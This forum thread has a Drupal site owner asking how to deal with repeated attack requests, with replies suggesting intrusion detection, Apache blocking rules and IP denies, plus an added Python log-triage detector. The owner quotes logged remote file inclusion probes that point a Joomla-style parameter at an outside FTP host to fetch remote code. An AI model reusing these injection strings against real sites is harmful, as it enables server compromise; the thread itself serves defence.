One of my sites is under bombardment by a malicious, albeit ineffective, attacker. His attempts end in 403 or 404 errors. Is there a way I can deliberately build in a 5-10 second delay before the error page is displayed? I think that would further frustrate him.

Comments

WorldFallz’s picture

http://drupal.org/project/phpids might be worth looking at
===
"Give a man a fish and you feed him for a day.
Teach a man to fish and you feed him for a lifetime."
-- Lao Tzu
"God helps those who help themselves." -- Benjamin Franklin
"Search is your best friend." -- Worldfallz

nancydru’s picture

I'll check it out. My search didn't find that one because it doesn't have "hacker" in it. I found Troll, but it doesn't look promising.

zeta ζ’s picture

If the error page is PHP you could use sleep(int seconds)
___________________
It’s in the detaιls…

demonstration portfolio

yelvington’s picture

DOS attacks usually come from scripts and delays won't do anything but suck resources out of your server.

If there is anything predictable about the requests, such as referrers, requested URLs, IP addresses, etc., you may be able to block them at the server level with a simple Apache directive.

With mod_access: http://httpd.apache.org/docs/1.3/mod/mod_access.html

With mod_rewrite: http://www.bhatt.id.au/article/41/

With mod_security: http://atomicplayboy.net/blog/2005/01/30/an-introduction-to-mod-security/

nancydru’s picture

There are some similarities. Generally, they seem to try some string (a command of some kind) in several different forms. Such as

http://nanwich.info/sitedoc/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://194.177.97.246/tmp/1422423437/24224234310/old?
http://nanwich.info/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://194.177.97.246/tmp/1422423437/24224234310/1?
http://nanwich.info/sitedoc/table/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://194.177.97.246/tmp/1422423437/24224234310/1?

I have been reading articles on those facilities. The problem is that he keeps trying different strings and different IP addresses.

He won this time because I took the site offline for a while.

Nancy Dru (formerly Nancy W. until I got married to Drupal)

Anonymous’s picture

Find the internet service providers of every IP address that you are getting this from and report the matter.

.htaccess deny the IP addresses you do have (although if it is coming from people's PCs then you could be blocking potential visitors)

nancydru’s picture

But most reports bounce. The few that didn't I never hear from again. Certainly I can block IPs, but I see lots of articles on the web that speak to the futility of doing so. Maybe it will help in the short run.

One thing I see in the requests is that at least half of them contain double slashes, which no real Drupal request would. I'm reading the Apache docs to see how to write a rule to block those to start with.

Nancy Dru (formerly Nancy W. until I got married to Drupal)
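An added example, not part of the thread or of any poster's code: a log-triage sketch that flags the two traits described above, a double slash in the path and a query parameter whose value is a remote ftp:// or http(s):// URL, so the match does not depend on the source IP or the exact string tried. The names `probe_reasons` and `triage` are hypothetical, and every sample request except the first is constructed.

```python
import re
from urllib.parse import parse_qsl, unquote

# A parameter value that begins with a remote scheme (remote file inclusion probe).
REMOTE_VALUE = re.compile(r"^\s*(?:ftp|https?)://", re.IGNORECASE)
# Leading "scheme://host" of a full URL, stripped before the path is inspected.
ORIGIN = re.compile(r"^[a-z][a-z0-9+.-]*://[^/?#]*", re.IGNORECASE)

def probe_reasons(url):
    """Return why a request looks like a probe; an empty list means no match."""
    # Accept a full URL or the bare request-target found in an access log.
    path, _, query = ORIGIN.sub("", url, count=1).partition("?")
    reasons = []
    if "//" in unquote(path):
        reasons.append("double-slash-path")
    # parse_qsl percent-decodes, so ftp%3A%2F%2F is caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_VALUE.match(value):
            reasons.append("remote-url-param:" + name)
    return reasons

def triage(urls):
    """Map each matching URL to its reasons, dropping clean requests."""
    return {u: r for u in urls if (r := probe_reasons(u))}

# First URL is quoted from the thread; the rest are constructed for illustration.
SAMPLES = [
    "http://nanwich.info/sitedoc/components/com_artlinks/artlinks.dispnew.php"
    "?mosConfig_absolute_path=ftp://194.177.97.246/tmp/1422423437/24224234310/old?",
    "/components//com_artlinks//artlinks.dispnew.php",
    "/index.php?page=HTTP%3A%2F%2Ffiles.example%2Fx.txt",
    "/node/5?destination=node/12",
]

if __name__ == "__main__":
    for url, reasons in triage(SAMPLES).items():
        print(reasons, url)
```

Running this over a day of access-log requests before writing a block rule shows whether any legitimate traffic would match, for instance a parameter that carries an absolute URL on purpose.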

nancydru’s picture

These look more like hacking (injection) attacks rather than DOS, although their frequency could result in that.

And my host just said they don't have ModSecurity...

Nancy Dru (formerly Nancy W. until I got married to Drupal)